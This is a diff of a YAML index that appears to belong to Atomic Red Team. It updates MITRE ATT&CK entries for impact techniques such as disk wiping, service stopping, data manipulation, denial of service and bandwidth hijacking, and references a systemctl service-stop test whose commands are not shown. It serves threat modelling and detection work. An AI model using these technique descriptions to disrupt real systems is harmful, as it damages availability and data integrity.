-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -68603,12 +69367,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -68669,109 +69454,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -68780,10 +69535,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -68794,9 +69553,32 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests:
     - name: Linux - Stop service using systemctl
@@ -68903,32 +69685,7 @@ impact:
         elevation_required: true
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -68946,13 +69703,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -68960,36 +69724,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -68998,11 +69753,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -69011,17 +69772,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -69030,6 +69805,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -69045,17 +69821,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -69065,14 +69836,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -69081,28 +69853,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -69113,7 +69885,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -69124,17 +69895,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -69171,7 +69937,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -69192,7 +69959,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -69219,12 +69986,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -69257,7 +70090,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -69267,10 +70100,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -69333,7 +70165,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -69374,7 +70205,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -69395,9 +70226,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
